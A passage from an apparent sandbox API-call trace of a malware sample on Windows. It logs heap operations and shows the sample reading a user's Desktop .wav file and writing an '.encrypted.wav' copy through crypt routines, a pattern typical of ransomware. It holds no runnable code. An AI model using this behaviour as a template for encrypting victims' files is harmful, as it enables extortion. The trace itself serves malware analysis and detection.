(in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.535] CryptDestroyHash (hHash=0x7c2240) returned 1 [0029.535] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.535] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.535] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0029.535] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0029.536] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.536] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\32U39klehZ.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\32u39klehz.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0029.536] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0029.536] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0029.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0029.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0029.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0029.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0029.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0029.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0029.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0029.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0029.536] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0029.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0029.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0029.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0029.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0029.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0029.536] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0029.536] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0029.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0029.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0029.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0029.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0029.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0029.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0029.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0029.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0029.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0029.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0029.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0029.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0029.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0029.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0029.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0029.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0029.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0029.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0029.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0029.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0029.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0029.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0029.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0029.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0029.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0029.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0029.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0029.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0029.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0029.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0029.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0029.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0029.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0029.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0029.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0029.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0029.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0029.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0029.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0029.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0029.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0029.538] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0029.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0029.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0029.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0029.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0029.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0029.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0029.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0029.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0029.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0029.538] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\32U39klehZ.encrypted.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\32u39klehz.encrypted.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0029.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0029.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0029.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0029.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0029.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0029.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0029.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0029.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0029.539] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0029.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0029.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0029.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0029.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0029.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0029.550] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0029.550] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0029.550] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.550] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0029.550] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.550] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0029.550] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0029.550] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0029.550] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0029.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0029.550] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0029.550] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0029.550] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0029.550] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0029.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0029.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0029.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0029.550] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0029.550] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0029.550] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0029.550] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0029.551] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0029.551] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0029.554] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x4d27, lpOverlapped=0x0) returned 1 [0029.554] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0029.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0029.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0029.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0029.554] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0029.554] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14d27) returned 0x8affc0 [0029.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0029.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0029.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0029.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0029.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0029.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0029.556] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14d27) returned 0x8c4cf0 [0029.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8affc0 | out: hHeap=0x770000) returned 1 [0029.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0029.557] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0029.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0029.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0029.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0029.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0029.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14d27) returned 0x8affc0 [0029.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0029.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8affc0 | out: hHeap=0x770000) returned 1 [0029.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0029.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0029.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0029.557] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0029.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0029.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0029.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0029.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0029.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0029.557] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0029.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0029.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0029.557] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0029.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0029.557] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da188 [0029.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0029.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0029.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0029.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0029.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14d27) returned 0x8affc0 [0029.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0029.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da228 [0029.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0029.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0029.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0029.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da318 [0029.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0029.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0029.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0029.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da178 [0029.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0029.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0029.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0029.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c7d8 [0029.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0029.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0029.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0029.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0029.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0029.558] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14d27) returned 0x8d9a20 [0029.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0029.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0029.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0029.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0029.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0029.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0029.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0029.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0029.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0029.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0029.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0029.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0029.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0029.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0029.559] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0029.559] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0029.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0029.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0029.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0029.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0029.560] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0029.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0029.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0029.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0029.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0029.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0029.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0029.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0029.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0029.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0029.560] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0029.560] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0029.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: 